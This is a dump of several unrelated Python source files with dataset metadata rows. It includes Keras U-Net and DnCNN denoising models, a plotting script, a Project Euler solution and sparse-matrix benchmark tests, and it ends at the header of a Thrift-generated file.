| 31.781233 | 277 | 0.566052 | 18,458 | 171,714 | 5.24591 | 0.051035 | 0.016441 | 0.028772 | 0.017949 | 0.80543 | 0.776617 | 0.749032 | 0.731496 | 0.71807 | 0.693749 | 0 | 0.018561 | 0.255454 | 171,714 | 5,402 | 278 | 31.787116 | 0.738809 | 0.40992 | 0 | 0.704005 | 0 | 0 | 0.211229 | 0.000398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053632 | false | 0.000679 | 0.007468 | 0 | 0.080109 | 0.027155 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc7246fb52887bdf2e9930f51cd43668a1eece83 | 153 | py | Python | tests/test_version.py | kianmeng/pytest-localserver | 387eb4a9e2b9a0e116685fd0ed2ace7dd710bb5b | [
"MIT"
] | 8 | 2021-11-10T14:06:36.000Z | 2022-01-12T20:57:31.000Z | tests/test_version.py | kianmeng/pytest-localserver | 387eb4a9e2b9a0e116685fd0ed2ace7dd710bb5b | [
"MIT"
] | 16 | 2021-11-08T19:37:03.000Z | 2022-02-14T12:27:11.000Z | tests/test_version.py | kianmeng/pytest-localserver | 387eb4a9e2b9a0e116685fd0ed2ace7dd710bb5b | [
"MIT"
] | 3 | 2021-11-09T08:07:33.000Z | 2022-02-11T15:07:25.000Z | import pytest_localserver
def test_version():
assert hasattr(pytest_localserver, "VERSION")
assert isinstance(pytest_localserver.VERSION, str)
| 21.857143 | 54 | 0.79085 | 17 | 153 | 6.882353 | 0.588235 | 0.435897 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130719 | 153 | 6 | 55 | 25.5 | 0.879699 | 0 | 0 | 0 | 0 | 0 | 0.045752 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc8cc4ba5790a3ff04ceef242282e80ef650aa50 | 204 | py | Python | bluenrg/events/__init__.py | autopi-io/py-bluenrg | f3fa9df8fa9ff86b615aef1782f6bbce80298abf | [
"Apache-2.0"
] | null | null | null | bluenrg/events/__init__.py | autopi-io/py-bluenrg | f3fa9df8fa9ff86b615aef1782f6bbce80298abf | [
"Apache-2.0"
] | null | null | null | bluenrg/events/__init__.py | autopi-io/py-bluenrg | f3fa9df8fa9ff86b615aef1782f6bbce80298abf | [
"Apache-2.0"
] | null | null | null | # NOTE: This file is auto-generated, please do not modify
from .hci import *
from .hci_le_meta import *
from .aci_gap import *
from .aci_gatt_att import *
from .aci_l2cap import *
from .aci_hal import *
| 22.666667 | 57 | 0.75 | 35 | 204 | 4.171429 | 0.6 | 0.342466 | 0.356164 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005917 | 0.171569 | 204 | 8 | 58 | 25.5 | 0.857988 | 0.269608 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
cca624524dcffe635c7e2f757c27c8bb0bb39b8f | 11,181 | py | Python | unet&DnCNN/network.py | wanpiqiu123/Image-denoise-with-meta-learning | 72962e738c0285b9ccaf4db3421cf3a625f78d92 | [
"MIT"
] | 2 | 2020-12-16T08:37:01.000Z | 2022-02-14T02:02:38.000Z | unet&DnCNN/network.py | wanpiqiu123/Image-denoise-with-meta-learning | 72962e738c0285b9ccaf4db3421cf3a625f78d92 | [
"MIT"
] | null | null | null | unet&DnCNN/network.py | wanpiqiu123/Image-denoise-with-meta-learning | 72962e738c0285b9ccaf4db3421cf3a625f78d92 | [
"MIT"
] | null | null | null | import numpy as np
#import tensorflow as tf
from keras.initializers import TruncatedNormal
from keras.models import *
from keras.layers import Dropout,UpSampling2D,MaxPooling2D,Dense,Subtract
from keras.layers import Input,Conv2D,concatenate,Activation,BatchNormalization
from keras.optimizers import Adam
from config import *
from utils import m_psnr
#from keras import backend as K
def Unet():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))
merge6 = concatenate([drop4,up6], axis = 3)
conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(input = inputs, output = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def Unet1():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))
merge6 = concatenate([drop4,up6], axis = 3)
conv6 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
up7 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
up8 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(input = inputs, output = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def Unet2():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(16, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(4, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
up6 = Conv2D(4, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv5))
merge6 = concatenate([conv4,up6], axis = 3)
conv6 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
up7 = Conv2D(8, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(16, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
up8 = Conv2D(16, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
up9 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(input = inputs, output = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def Unet3():
inputs = Input(shape=(IMG_H,IMG_W,NUM_C))
conv1 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(16, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
up6 = Conv2D(16, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv5))
conv6 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up6)
up7 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
conv7 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up7)
up8 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
conv8 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up8)
up9 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
conv9 = Conv2D(8, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(up9)
conv10 = Conv2D(3, 1, activation = 'sigmoid')(conv9)
model = Model(input = inputs, output = conv10)
# model.summary()
return model
# model.compile(optimizer = Adam(lr = 1e-4), loss = 'mse', metrics = [m_psnr])
def MLP():
inputs = Input(shape=(EMBEDDING_SHAPE))
layer = Dense(32,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(inputs)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(512,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(512,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(256,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
layer = Dropout(0.3)(layer)
layer = Dense(32,activation="relu",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
outputs = Dense(4,activation="sigmoid",kernel_initializer=TruncatedNormal(mean=0.0, stddev=0.01))(layer)
model = Model(input = inputs, output = outputs)
return model
def DnCNN():
inpt = Input(shape=(None,None,NUM_C))
# 1st layer, Conv+relu
x = Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding='same')(inpt)
x = Activation('relu')(x)
# 15 layers, Conv+BN+relu
for i in range(15):
x = Conv2D(filters=64, kernel_size=(3,3), strides=(1,1), padding='same')(x)
x = BatchNormalization(axis=-1, epsilon=1e-3)(x)
x = Activation('relu')(x)
# last layer, Conv
x = Conv2D(filters=NUM_C, kernel_size=(3,3), strides=(1,1), padding='same')(x)
x = Subtract()([inpt, x]) # input - noise
model = Model(inputs=inpt, outputs=x)
return model
# if __name__== '__main__':
# print(NUM_C) | 62.116667 | 132 | 0.665504 | 1,469 | 11,181 | 4.953029 | 0.088496 | 0.123145 | 0.155855 | 0.185542 | 0.896372 | 0.890874 | 0.890874 | 0.890874 | 0.890874 | 0.890874 | 0 | 0.071482 | 0.162955 | 11,181 | 180 | 133 | 62.116667 | 0.705951 | 0.048654 | 0 | 0.551724 | 0 | 0 | 0.094615 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041379 | false | 0 | 0.055172 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aeb618a37848ec6e5ceeb3239e54c2e435985381 | 2,328 | py | Python | scripts/ttest.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | scripts/ttest.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | scripts/ttest.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | import numpy as np
from scipy import stats as st
import sys
from matplotlib import pyplot as plt
mat1 = np.loadtxt(sys.argv[1], dtype=object)
enrichments1 = np.array(mat1[:,6], dtype=float)
mat2 = np.loadtxt(sys.argv[2], dtype=object)
enrichments2 = np.array(mat2[:,6], dtype=float)
print st.ttest_ind(enrichments1, enrichments2)
xs = enrichments1
#need to know bins to get y range
bins = plt.hist(xs)
plt.close()
#start with a frameless plot (extra room on the left)
plt.subplot2grid((10,10), (0,0), 9, 10, frameon=False)
#label axes
plt.xlabel("GM12878 enhancer coverage", fontsize=14)
plt.title("Relocalized", fontsize=14)
#define offsets
xmin = min(xs)
xmax = max(xs)
x_range = xmax - xmin
x_start = xmin - x_range/25. #bigger offset for bar plot
x_end = xmax + x_range/25.
ymin = 0
ymax = max(bins[0])
y_range = ymax - ymin
#y_start = ymin - y_range/25.
y_start = 0
y_end = ymax + y_range/25.
#plot
plt.hist(xs, rwidth=0.8, bottom=y_start)
#define axes with offsets
plt.axis([x_start, x_end, y_start, y_end], frameon=False)
#plot axes (black with line width of 4)
plt.axvline(x=x_start, color="k", lw=4)
plt.axhline(y=y_start, color="k", lw=4)
#plot ticks
plt.tick_params(direction="out", top=False, right=False, length=12, width=3, pad=5, labelsize=12)
plt.savefig("relocalization_enhancer_coverage")
plt.close()
xs = enrichments2
#need to know bins to get y range
bins = plt.hist(xs)
plt.close()
#start with a frameless plot (extra room on the left)
plt.subplot2grid((10,10), (0,0), 9, 10, frameon=False)
#label axes
plt.xlabel("GM12878 enhancer coverage", fontsize=14)
plt.title("Background", fontsize=14)
#define offsets
xmin = min(xs)
xmax = max(xs)
x_range = xmax - xmin
x_start = xmin - x_range/25. #bigger offset for bar plot
x_end = xmax + x_range/25.
ymin = 0
ymax = max(bins[0])
y_range = ymax - ymin
#y_start = ymin - y_range/25.
y_start = 0
y_end = ymax + y_range/25.
#plot
plt.hist(xs, rwidth=0.8, bottom=y_start)
#define axes with offsets
plt.axis([x_start, x_end, y_start, y_end], frameon=False)
#plot axes (black with line width of 4)
plt.axvline(x=x_start, color="k", lw=4)
plt.axhline(y=y_start, color="k", lw=4)
#plot ticks
plt.tick_params(direction="out", top=False, right=False, length=12, width=3, pad=5, labelsize=12)
plt.savefig("background_enhancer_coverage")
plt.close()
| 24.505263 | 97 | 0.719072 | 418 | 2,328 | 3.901914 | 0.260766 | 0.036787 | 0.022072 | 0.031882 | 0.772532 | 0.772532 | 0.772532 | 0.772532 | 0.772532 | 0.772532 | 0 | 0.047761 | 0.136598 | 2,328 | 94 | 98 | 24.765957 | 0.763682 | 0.204467 | 0 | 0.727273 | 0 | 0 | 0.076965 | 0.032751 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.072727 | null | null | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aedb5bf037c348ce36b3534cb71be656ae15d70c | 1,719 | py | Python | soluciones/problema8.py | hernan-erasmo/project-euler | d68aa90c5fe2bf733bec54af5a786a2c144783bc | [
"Unlicense"
] | null | null | null | soluciones/problema8.py | hernan-erasmo/project-euler | d68aa90c5fe2bf733bec54af5a786a2c144783bc | [
"Unlicense"
] | null | null | null | soluciones/problema8.py | hernan-erasmo/project-euler | d68aa90c5fe2bf733bec54af5a786a2c144783bc | [
"Unlicense"
] | null | null | null | def main():
numerote = """73167176531330624919225119674426574742355349194934
96983520312774506326239578318016984801869478851843
85861560789112949495459501737958331952853208805511
12540698747158523863050715693290963295227443043557
66896648950445244523161731856403098711121722383113
62229893423380308135336276614282806444486645238749
30358907296290491560440772390713810515859307960866
70172427121883998797908792274921901699720888093776
65727333001053367881220235421809751254540594752243
52584907711670556013604839586446706324415722155397
53697817977846174064955149290862569321978468622482
83972241375657056057490261407972968652414535100474
82166370484403199890008895243450658541227588666881
16427171479924442928230863465674813919123162824586
17866458359124566529476545682848912883142607690042
24219022671055626321111109370544217506941658960408
07198403850962455444362981230987879927244284909188
84580156166097919133875499200524063689912560717606
05886116467109405077541002256983155200055935729725
71636269561882670428252483600823257530420752963450"""
maximo_producto = 0
n = numerote.replace('\n',"")
size_feta = 13
#Avanzando de a uno, cantidad de veces que voy
#a tomar size_feta elementos de la lista
rango_fetas = len(n) - size_feta + 1
for i in range(rango_fetas):
prod = functools.reduce(operator.mul, [int(x) for x in n[i:size_feta+i]], 1) #http://stackoverflow.com/a/19334399/1603080
if prod > maximo_producto:
maximo_producto = prod
print "El maximo_producto formado por un subconjunto de 13 digitos es: " + str(maximo_producto)
if __name__ == '__main__':
import operator #http://stackoverflow.com/a/13840436/1603080
import functools #http://stackoverflow.com/a/13840436/1603080
main()
| 40.928571 | 123 | 0.874346 | 127 | 1,719 | 11.685039 | 0.598425 | 0.04717 | 0.040431 | 0.042453 | 0.048518 | 0.048518 | 0 | 0 | 0 | 0 | 0 | 0.661219 | 0.074462 | 1,719 | 41 | 124 | 41.926829 | 0.271527 | 0.123909 | 0 | 0 | 0 | 0 | 0.728181 | 0.666223 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.029412 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aefcf1368fa19dae691996818672035b1791bfd5 | 6,459 | py | Python | tests/test_cvb.py | harenbrs/sparsulant | a55cba9a54da4d3e63fc3aae5c262097196e3784 | [
"MIT"
] | null | null | null | tests/test_cvb.py | harenbrs/sparsulant | a55cba9a54da4d3e63fc3aae5c262097196e3784 | [
"MIT"
] | null | null | null | tests/test_cvb.py | harenbrs/sparsulant | a55cba9a54da4d3e63fc3aae5c262097196e3784 | [
"MIT"
] | null | null | null | from functools import lru_cache
import pytest
import numpy as np
from sparsulant import cvb_matrix, cir_matrix, nbytes
@pytest.mark.benchmark(group='cvb[cir]-vmul')
class TestCIRBlockVectorMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
vector = state.uniform(-1, 1, shape[1])
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir, shift), shape), vector
def test_cvb_cir_vmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_vector, vector)
assert np.allclose(result, cvb.tocsr()._mul_vector(vector))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_cir_vmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_vector, vector)
benchmark.extra_info['memory'] = nbytes(csr)
@pytest.mark.benchmark(group='cvb[cir]-mmul')
class TestCIRBlockMatrixMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
matrix = state.uniform(-1, 1, (shape[1], shape[1]//10))
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir, shift), shape), matrix
def test_cvb_cir_mmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_multivector, matrix)
assert np.allclose(result, cvb.tocsr()._mul_multivector(matrix))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_cir_mmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_multivector, matrix)
benchmark.extra_info['memory'] = nbytes(csr)
@pytest.mark.benchmark(group='cvb[csr]-vmul')
class TestCSRBlockVectorMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
vector = state.uniform(-1, 1, shape[1])
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir.tocsr(), shift), shape), vector
def test_cvb_csr_vmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_vector, vector)
assert np.allclose(result, cvb.tocsr()._mul_vector(vector))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_csr_vmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, vector = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_vector, vector)
benchmark.extra_info['memory'] = nbytes(csr)
@pytest.mark.benchmark(group='cvb[csr]-mmul')
class TestCSRBlockMatrixMultiplication:
@lru_cache(maxsize=1, typed=True)
def get_setup(self, n_blocks, block_shape, block_shift, shift, density):
shape = (n_blocks*block_shape[0], block_shape[1])
state = np.random.RandomState(0)
row = state.uniform(-1, 1, shape[1])
matrix = state.uniform(-1, 1, (shape[1], shape[1]//10))
if isinstance(density, int) and density == 1:
cir = cir_matrix((row, block_shift), block_shape)
else:
mask = state.uniform(0, 1, shape[1]) <= density
data = row[mask]
offsets, = np.nonzero(mask)
cir = cir_matrix((data, offsets, block_shift), block_shape)
return cvb_matrix((cir.tocsr(), shift), shape), matrix
def test_cvb_csr_mmul(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
result = benchmark(cvb._mul_multivector, matrix)
assert np.allclose(result, cvb.tocsr()._mul_multivector(matrix))
benchmark.extra_info['memory'] = nbytes(cvb)
def test_cvb_csr_mmul_baseline(
self, n_blocks, block_shape, block_shift, shift, density, benchmark
):
cvb, matrix = self.get_setup(n_blocks, block_shape, block_shift, shift, density)
csr = cvb.tocsr()
benchmark(csr._mul_multivector, matrix)
benchmark.extra_info['memory'] = nbytes(csr)
| 36.908571 | 88 | 0.619446 | 803 | 6,459 | 4.759651 | 0.084682 | 0.094192 | 0.075353 | 0.10675 | 0.93145 | 0.92831 | 0.90293 | 0.90293 | 0.90293 | 0.90293 | 0 | 0.013072 | 0.265676 | 6,459 | 174 | 89 | 37.12069 | 0.792747 | 0 | 0 | 0.806452 | 0 | 0 | 0.015482 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.032258 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4e1907f5655dbca0c8b621be208f77f0b91d7c6d | 28,137 | py | Python | client/python/socialcoffee/gen-py/socialcoffee/thrift/SocialCoffeeService.py | iaintshine/social_coffee | 7b86f4cddf9576ec45206d340fd294475ce7a67f | [
"MIT"
] | 1 | 2020-04-13T10:44:09.000Z | 2020-04-13T10:44:09.000Z | client/python/socialcoffee/gen-py/socialcoffee/thrift/SocialCoffeeService.py | iaintshine/social_coffee | 7b86f4cddf9576ec45206d340fd294475ce7a67f | [
"MIT"
] | null | null | null | client/python/socialcoffee/gen-py/socialcoffee/thrift/SocialCoffeeService.py | iaintshine/social_coffee | 7b86f4cddf9576ec45206d340fd294475ce7a67f | [
"MIT"
] | null | null | null | #
# Autogenerated by Thrift Compiler (1.0.0-dev)
#
